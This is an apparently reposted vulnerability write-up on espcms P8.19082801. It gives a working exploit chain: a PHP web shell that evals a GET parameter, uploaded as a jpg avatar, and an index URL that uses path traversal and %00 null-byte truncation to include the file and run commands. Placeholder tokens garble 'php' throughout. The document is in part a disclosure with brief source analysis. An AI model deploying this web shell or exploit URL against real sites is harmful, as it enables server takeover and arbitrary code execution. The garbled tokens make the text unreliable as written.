espcms P8.19082801 vulnerability

概述author: naiquan chai  Net name:Hanamizuki花水木 Through  the vulnerability  we can get the webshell if we have enough privilege. Affected by this vulnerability requires server-side php version <5.3.4 Dem

author: naiquan chai 

Net name:Hanamizuki花水木

Through  the vulnerability  we can get the webshell if we have enough privilege.

Affected by this vulnerability requires server-sIDe @R_419_6952@ version <5.3.4

Demo

First enter the user module,then modify the user‘s avatar.Upload a file with the suffix jpg and the editorial content is 

<?@R_419_6952@
class test{
public static function in_test(){
　　eval($_GET[‘a‘]);
　　}
}
?>

Upload success.We can get the path from the Web page source code.

 Then go to the main page and pass in

"index.@R_419_6952@?ac=../upload/photo/userphoto_c4ca4238a0b923820dcc509a6f75849b.jpg%00&at=test&a=echo 1;"

 We find that the page echo 1.

 

Source code analysis

espCMS_web/espCMS_load.@R_419_6952@:

 We can find that through ac parameters we can include files,and at parameters can execute methods.

Tracking function espCMS_get_ac() and function espCMS_get_at():

 We can see that the function does not filter user input at all,so  ac parameter can facilitate the directory,this results in arbitrary file inclusion.

However,through the file espCMS_web/espCMS_load.@R_419_6952@,we find that the ac parameter is automatically followed by a .@R_419_6952@ suffix.

We can use truncation vulnerabilitIEs to bypass it,this requires  @R_419_6952@ version < 5.3.4

 

Final exp

index.@R_419_6952@?ac=../upload/photo/userphoto_c4ca4238a0b923820dcc509a6f75849b.jpg%00&at=test&a=echo 1;

总结

以上是内存溢出为你收集整理的espcms P8.19082801 vulnerability全部内容，希望文章能够帮你解决espcms P8.19082801 vulnerability所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错，欢迎将内存溢出网站推荐给程序员好友。